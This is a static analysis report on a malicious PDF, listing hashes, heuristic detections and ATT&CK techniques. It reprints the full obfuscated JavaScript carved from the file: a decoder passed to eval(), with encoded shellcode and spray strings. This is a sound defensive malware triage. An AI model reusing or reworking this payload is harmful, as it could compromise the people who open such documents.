Malicious PDF — malware analysis report

Static analysis result for SHA-256 9ac66b77e1cb6eca…

MALICIOUS

PDF

9.2 KB Created: 2010-05-12 06:28:46 Authoring application: uTB45H (via frr9qAR8) First seen: 2026-05-11
MD5: b9f3935bae53e48f73f0edf20a1d53b2 SHA-1: 14220ef5a05e6461a3dd91e4c838fa18393bb513 SHA-256: 9ac66b77e1cb6ecac143037acedd64b548d61b0e0a997579207be2b424437d5b
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1027 Obfuscated Files or Information

The PDF file contains embedded JavaScript that utilizes an eval() call, indicating an attempt to execute obfuscated code. This is a common technique for downloading and executing second-stage payloads. The heuristic firings for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL strongly support this conclusion. The obfuscated nature of the script and the lack of specific indicators prevent a more precise family attribution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    atM29atakxbPy<AxORzV Xyt=tE;takxbPy<AxORzV XytetXGamsr>v3EaTm<OR;takxbPy<AxORzV Xyt++tdn\ntttt3xGiTrKyGfOmIz{L[akxbPy<AxORzV Xy]t=tacAKRA9<hqSIVqQ2t+tRY3ZA3WyzY8P>3V8;\nttJ\nJ\nhc6LF}(6taxalsRzg>jvk<UIrMdn\ntt29at7{Bk0hc87D 1LE9Zt=tE;\ntt29atmiK63RTfR2A(0.b t=t93352}SsSaNSa7}(65F(ZFa}6IMd;\ntt9335LgS9a0}lSRcFMiwwND1j.4bRr4L.vd;\n\ntt}htMmiK63RTfR2A(0.b tety54dn\nttttoz(kgRxi{vuj zcEMEd;\ntttt29at0D9,qNfa(hvi32cIt=tc6S7L93SM\"%cELEL%cELEL\"d;\nttttsx}gStM0D9,qNfa(hvi32cI5gS6IFxtetYYzWQd0D9,qNfa(h …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23D 8032 bytes
SHA-256: f8749e53f8cc1a0c8411ce2a42325eeb98d4f553f710fcf083cb8a0ca9b87d02
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 111 of 175 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function wh3zrwR2TG(wh3zrwR2TG,Jig4KagkGO17vIrDZ) {var igwSJduibERfJJIv55y=wh3zrwR2TG. substr (Jig4KagkGO17vIrDZ, 1);return igwSJduibERfJJIv55y;}/*S7wgDG42|rwBNiUWBE5dI|ARWHCSD1*/function Es6lQ3(DPaMrdntw) {/*VyU22axu2eg3r|NEHSAk|Nksjsv2vmZH*/var P7LY1 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*tASKxDDRk69[KDxdDX3R8m1qXtb]Jja3jtDWwGoWDnCOrzrv*//*lCLN32lm|lv2Bpcvszi|d52H7HyxyjBamNofFP*/var T2BjMaRSeAPFQIWUYx /*Z04S2ju[RkLGDH9LEHA25k4]MHArMPzmGt*/= new String("eHMdnJt5),8OwrKBkD .vf{R<PiZ01NG>UT9VLAShIx}Cmgl6(3Xa7Fc2soqjE4QbYWpyuz");/*ATpmkPyrT5reAye2uEw|Q4G8GW|tchna1SCbh0J0w0Vw*/for(GQJzDNEAYc2Pw=0;GQJzDNEAYc2Pw<P7LY1.length;GQJzDNEAYc2Pw++) {if(DPaMrdntw == wh3zrwR2TG(T2BjMaRSeAPFQIWUYx, GQJzDNEAYc2Pw)) {/*ApZ5bgMWnKd98Mb[z2XI5zpw8giz2]fsA4ncbzyE*/return wh3zrwR2TG(P7LY1, GQJzDNEAYc2Pw);/*RD8df <TY3bTsHGrnphf]COA71*/}}return DPaMrdntw;}/*YrQcrigqBCLU[Fwux30fhgCD]FRgDJ9b0Q4hyb*//*zdaK4f6o|AfyXB0ai6|F91EbrUWPIxd8R3I*/var Mt2unr = new String;var Z8TsEF1mmwwC = new String("\n29at3xGiTrKyGfOmIz{Lt=t6Sst,aa9qMd;\n29atiwwND1j.4bRr4L.v;\nhc6LF}(6toalFpQ4VROvW.CIzMacAKRA9<hqSIVqQ2)tc63c33Gwb7D{VjNUdn\nttsx}gStMacAKRA9<hqSIVqQ25gS6IFxt*tQtetc63c33Gwb7D{VjNUdn\nttttacAKRA9<hqSIVqQ2t+=tacAKRA9<hqSIVqQ2;\nttJ\nttacAKRA9<hqSIVqQ2t=tacAKRA9<hqSIVqQ257cV7Fa}6IME)tc63c33Gwb7D{VjNUt/tQd;\nttaSFca6tacAKRA9<hqSIVqQ2;\nJ\nhc6LF}(6toz(kgRxi{vuj zcEMImWlT94V0DjWk1A8dn\ntt29atFZ0<a,XrGow3yzjYt=tEoELELELEL;\ntt29atRY3ZA3WyzY8P>3V8t=tc6S7L93SM\"%cYbYb%cYbYb%cYbYb%cEKr8%cbbW8%cppOz%cuE8z%cuEE4%crKbb%crQYb%cr8K,%cruEW%cKKrO%cKKKK%cu8yK%cwKYr%crKrK%cpYrK%crb,K%czKpY%cYQKb%czKpY%cprry%crKEb%crKr8%cpYrK%c8zEb%cp4uy%cr4,4%cEyEb%crK44%crKrK%c,,pp%c8zr8%cyyuy%cpW44%cEyr4%crK4K%crKrK%c,,pp%c8zry%cO,uy%c4EWK%cEyQw%crKEw%crKrK%c,,pp%c8zrb%cEEuy%cEKQ4%cEyuK%crKb8%crKrK%c,,pp%c8zKK%cQruy%cE,zp%cEyWy%crKQz%crKrK%c,,pp%c,KK8%cwypK%cz,QO%cpp4W%cKy,,%cruEp%crKrr%c84rK%cz,pp%cpYO8%cr8,,%crruW%cpY8p%cKy8,%cEy8z%crKpY%crKrK%cuy8K%cKWwz%czKOE%cyuEy%crKrK%cpprK%cKb,,%cQ,pY%cQKpO%cpp8K%cOK,,%c4Euy%crKrK%c8KrK%c,,pY%cuWK8%c8prw%c8,pY%cEyKy%crKur%crKrK%c,,rO%cQuOK%c8brK%cO4z4%cQuu,%cr8,K%cu,zy%crKrK%cz,4E%cpYOK%crb,,%crruW%cpY8p%cKy8,%c,KEy%crKrK%cuWrK%c8yru%c,,rO%cwOO8%c8ObY%c4E8O%cOKz,%c8O8K%c,,pY%cuWKb%c8pr,%c8,pY%cEyKy%crKOO%crKrK%crKuW%cz,4E%cpYOK%cry,,%crwuW%cpY8p%cKy8,%cKKEy%crKrK%cuWrK%cpY4E%cKK,,%crruW%cpY8p%cKy8,%crKEy%crKrK%c,rrK%c8w8Y%cErrO%cErrO%cErrO%cErrO%cEbpO%c8Wr8%cpY8O%cEwbW%c8w4u%cEK4E%cpY8,%cpYEb%cryzQ%c8QpY%c8zrb%czOpY%cpYwb%cK4z8%crOzy%c8z4O%czzpY%crOOK%cwO4O%c,pQp%cYQ,r%cQOrO%cwO8z%crE4z%cKKW4%c4wwW%cryz8%cQ4Qr%crOrQ%c,K4w%c4rEY%c44wY%cz,84%c8WE,%cEYpY%c8WpY%crOO8%cuzbQ%crbpY%cpY,Y%cKb8W%cbQrO%cr8pY%crOpY%c84Q,%cQw8Q%crKry%c48Ey%c4E44%c8,4E%c,b8w%c,E,Q%crK,4%cyYpu%cyEyY%cQKb,%cpYQK%cpwbE%cb4p4%cybpr%cpzQr%cpppr%cQKpK%cpOpQ%cpypK%cpOQK%cp4pK%cQrpY%cpuyE%cbKyE%cpYpz%cbzbw%cEEby\"d;\ntt}htMImWlT94V0DjWk1A8t==t4dn\nttttFZ0<a,XrGow3yzjYt=tEobEbEbEbE;\nttttRY3ZA3WyzY8P>3V8t=tc6S7L93SM\"%cYbYb%cYbYb%cYbYb%cEKr8%cbbW8%cppOz%cuE8z%cuEE4%crKbb%crQYb%cr8K,%cruEW%cKKrO%cKKKK%cu8yK%cwKYr%crKrK%cpYrK%crb,K%czKpY%cYQKb%czKpY%cprry%crKEb%crKr8%cpYrK%c8zEb%cp4uy%cr4,4%cEyEb%crK44%crKrK%c,,pp%c8zr8%cyyuy%cpW44%cEyr4%crK4K%crKrK%c,,pp%c8zry%cO,uy%c4EWK%cEyQw%crKEw%crKrK%c,,pp%c8zrb%cEEuy%cEKQ4%cEyuK%crKb8%crKrK%c,,pp%c8zKK%cQruy%cE,zp%cEyWy%crKQz%crKrK%c,,pp%c,KK8%cwypK%cz,QO%cpp4W%cKy,,%cruEp%crKrr%c84rK%cz,pp%cpYO8%cr8,,%crruW%cpY8p%cKy8,%cEy8z%crKpY%crKrK%cuy8K%cKWwz%czKOE%cyuEy%crKrK%cpprK%cKb,,%cQ,pY%cQKpO%cpp8K%cOK,,%c4Euy%crKrK%c8KrK%c,,pY%cuWK8%c8prw%c8,pY%cEyKy%crKur%crKrK%c,,rO%cQuOK%c8brK%cO4z4%cQuu,%cr8,K%cu,zy%crKrK%cz,4E%cpYOK%crb,,%crruW%cpY8p%cKy8,%c,KEy%crKrK%cuWrK%c8yru%c,,rO%cwOO8%c8ObY%c4E8O%cOKz,%c8O8K%c,,pY%cuWKb%c8pr,%c8,pY%cEyKy%crKOO%crKrK%crKuW%cz,4E%cpYOK%cry,,%crwuW%cpY8p%cKy8,%cKKEy%crKrK%cuWrK%cpY4E%cKK,,%crruW%cpY8p%cKy8,%crKEy%crKrK%c,rrK%c8w8Y%cErrO%cErrO%cErrO%cErrO%cEbpO%c8Wr8%cpY8O%cEwbW%c8w4u%cEK4E%cpY8,%cpYEb%cryzQ%c8QpY%c8zrb%czOpY%cpYwb%cK4z8%crOzy%c8z4O%czzpY%crOOK%cwO4O%c,pQp%cYQ,r%cQOrO%cwO8z%crE4z%cKKW4%c4wwW%cryz8%cQ4Qr%crOrQ%c,K4w%c4rEY%c44wY%cz,84%c8WE,%cEYpY%c8WpY%crOO8%cuzbQ%crbpY%cpY,Y%cKb8W%cbQrO%cr8pY%crOpY%c84Q,%cQw8Q%crKry%c48Ey%c4E44%c8,4E%c,b8w%c,E,Q%crK,4%cyYpu%cyEyY%cQKb,%cpYQK%cpwbE%cb4p4%cybpr%cpzQr%cpppr%cQKpK%cpOpQ%cpypK%cpOQK%cp4pK%cQrpY%cpuyE%cbKyE%cpYpz%cbzbw%cEEby\"d;\nttJ\nttSg7St}htMImWlT94V0DjWk1A8t==tQdn\nttttRY3ZA3WyzY8P>3V8t=tc6S7L93SM\"%cYbYb%cYbYb%cYbYb%cEKr8%cbbW8%cppOz%cuE8z%cuEE4%crKbb%crQYb%cr8K,%cruEW%cKKrO%cKKKK%cu8yK%cwKYr%crKrK%cpYrK%crb,K%czKpY%cYQKb%czKpY%cprry%crKEb%crKr8%cpYrK%c8zEb%cp4uy%cr4,4%cEyEb%crK44%crKrK%c,,pp%c8zr8%cyyuy%cpW44%cEyr4%crK4K%crKrK%c,,pp%c8zry%cO,uy%c4EWK%cEyQw%crKEw%crKrK%c,,pp%c8zrb%cEEuy%cEKQ4%cEyuK%crKb8%crKrK%c,,pp%c8zKK%cQruy%cE,zp%cEyWy%crKQz%crKrK%c,,pp%c,KK8%cwypK%cz,QO%cpp4W%cKy,,%cruEp%crKrr%c84rK%cz,pp%cpYO8%cr8,,%crruW%cpY8p%cKy8,%cEy8z%crKpY%crKrK%cuy8K%cKWwz%czKOE%cyuEy%crKrK%cpprK%cKb,,%cQ,pY%cQKpO%cpp8K%cOK,,%c4Euy%crKrK%c8KrK%c,,pY%cuWK8%c8prw%c8,pY%cEyKy%crKur%crKrK%c,,rO%cQuOK%c8brK%cO4z4%cQuu,%cr8,K%cu,zy%crKrK%cz,4E%cpYOK%crb,,%crruW%cpY8p%cKy8,%c,KEy%crKrK%cuWrK%c8yru%c,,rO%cwOO8%c8ObY%c4E8O%cOKz,%c8O8K%c,,pY%cuWKb%c8pr,%c8,pY%cEyKy%crKOO%crKrK%crKuW%cz,4E%cpYOK%cry,,%crwuW%cpY8p%cKy8,%cKKEy%crKrK%cuWrK%cpY4E%cKK,,%crruW%cpY8p%cKy8,%crKEy%crKrK%c,rrK%c8w8Y%cErrO%cErrO%cErrO%cErrO%cEbpO%c8Wr8%cpY8O%cEwbW%c8w4u%cEK4E%cpY8,%cpYEb%cryzQ%c8QpY%c8zrb%czOpY%cpYwb%cK4z8%crOzy%c8z4O%czzpY%crOOK%cwO4O%c,pQp%cYQ,r%cQOrO%cwO8z%crE4z%cKKW4%c4wwW%cryz8%cQ4Qr%crOrQ%c,K4w%c4rEY%c44wY%cz,84%c8WE,%cEYpY%c8WpY%crOO8%cuzbQ%crbpY%cpY,Y%cKb8W%cbQrO%cr8pY%crOpY%c84Q,%cQw8Q%crKry%c48Ey%c4E44%c8,4E%c,b8w%c,E,Q%crK,4%cyYpu%cyEyY%cQKb,%cpYQK%cpwbE%cb4p4%cybpr%cpzQr%cpppr%cQKpK%cpOpQ%cpypK%cpOQK%cp4pK%cQrpY%cpuyE%cbKyE%cpYpz%cbzbw%cEEby\"d;\nttJ\ntt29atxp9zBP{lRVLNCVULt=tEoYEEEEE;\ntt29atTRpDrE<fOV6mP<2}t=tRY3ZA3WyzY8P>3V85gS6IFxt*tQ;\ntt29atc63c33Gwb7D{VjNUt=txp9zBP{lRVLNCVULt-tMTRpDrE<fOV6mP<2}t+tEobud;\ntt29atacAKRA9<hqSIVqQ2t=tc6S7L93SM\"%czEzE%czEzE\"d;\nttacAKRA9<hqSIVqQ2t=toalFpQ4VROvW.CIzMacAKRA9<hqSIVqQ2)tc63c33Gwb7D{VjNUd;\ntt29atXGamsr>v3EaTm<ORt=tMFZ0<a,XrGow3yzjYt-tEoYEEEEEdt/txp9zBP{lRVLNCVUL;\ntth(atM29atakxbPy<AxORzV Xyt=tE;takxbPy<AxORzV XytetXGamsr>v3EaTm<OR;takxbPy<AxORzV Xyt++tdn\ntttt3xGiTrKyGfOmIz{L[akxbPy<AxORzV Xy]t=tacAKRA9<hqSIVqQ2t+tRY3ZA3WyzY8P>3V8;\nttJ\nJ\nhc6LF}(6taxalsRzg>jvk<UIrMdn\ntt29at7{Bk0hc87D 1LE9Zt=tE;\ntt29atmiK63RTfR2A(0.b t=t93352}SsSaNSa7}(65F(ZFa}6IMd;\ntt9335LgS9a0}lSRcFMiwwND1j.4bRr4L.vd;\n\ntt}htMmiK63RTfR2A(0.b tety54dn\nttttoz(kgRxi{vuj zcEMEd;\ntttt29at0D9,qNfa(hvi32cIt=tc6S7L93SM\"%cELEL%cELEL\"d;\nttttsx}gStM0D9,qNfa(hvi32cI5gS6IFxtetYYzWQd0D9,qNfa(hvi32cIt+=t0D9,qNfa(hvi32cI;\nttttFx}7t5L(gg9VZF(aSt=tO(gg9V5L(ggSLFrl9}gD6h(Mn\ntttttt7cVCt:t\"\")tl7It:t0D9,qNfa(hvi32cI\nttttJ\nttttd;\nttJ\n}htMmiK63RTfR2A(0.b tH=tzdn\nttttFaqtn\n}htM9335A(L5O(gg9V5ISFDL(6dn\nttttttttoz(kgRxi{vuj zcEMQd;\ntttttttt29atK,1OUYUsqOgZG6lrt=tc6S7L93SM\"%Ez\"d;\nttttttttsx}gStMK,1OUYUsqOgZG6lr5gS6IFxtetEoYEEEdK,1OUYUsqOgZG6lrt+=tK,1OUYUsqOgZG6lr;\nttttttttK,1OUYUsqOgZG6lrt=t\"{5\"t+tK,1OUYUsqOgZG6lr;\n9335A(L5O(gg9V5ISFDL(6MK,1OUYUsqOgZG6lrd;\ntttttttt7{Bk0hc87D 1LE9Zt=t4;\nttttttJ\nttttttSg7Stn\ntttttttt7{Bk0hc87D 1LE9Zt=t4;\nttttttJ\nttttJ\nttttL9FLxtMSdn\ntttttt7{Bk0hc87D 1LE9Zt=t4;\nttttJ\ntttt}htM7{Bk0hc87D 1LE9Zt==t4dn\ntttttt}htMMmiK63RTfR2A(0.b tH=ty54&&tmiK63RTfR2A(0.b tetzddn\nttttttttoz(kgRxi{vuj zcEM4d;\ntttttttt29at f<W7g2IikuBOQoTt=t\"4Qzzzzzzzzzzzzzzzzzz\";\ntttttttth(atMrigmN.x1>ZsWK}Dvt=tE;trigmN.x1>ZsWK}DvtetQyp;trigmN.x1>ZsWK}Dvt++tdn\ntttttttttt f<W7g2IikuBOQoTt+=t\"u\";\nttttttttJ\nttttttttcF}g53a}6FhM\"%YWEEEh\")t f<W7g2IikuBOQoTd;\nttttttJ\nttttJ\nttJ\nJ\n9335SxPoZvSFAg,36z<qt=taxalsRzg>jvk<UIr;\niwwND1j.4bRr4L.vt=t93357SF0}lSRcFM\"9335SxPoZvSFAg,36z<qMd\")t4Ed;\n");/*ZF0r5WgS{Xt6TbBTSFu9}GPi4tgLmpXB*//*OtqkP88ns56J6PcCA|cHrBBahNDNkF|zznZEmYsVUoeQ47T4ZvB*/for(XJhOGTXyWw=0;XJhOGTXyWw<Z8TsEF1mmwwC.length;XJhOGTXyWw++)Mt2unr += Es6lQ3(wh3zrwR2TG(Z8TsEF1mmwwC,XJhOGTXyWw));eval(Mt2unr);/*wDhUQk[AqfqfJGkwfSHz]mG1jZw8LxF81nTHN193W*/

Open this report in the interactive analyzer, or submit your own file for analysis.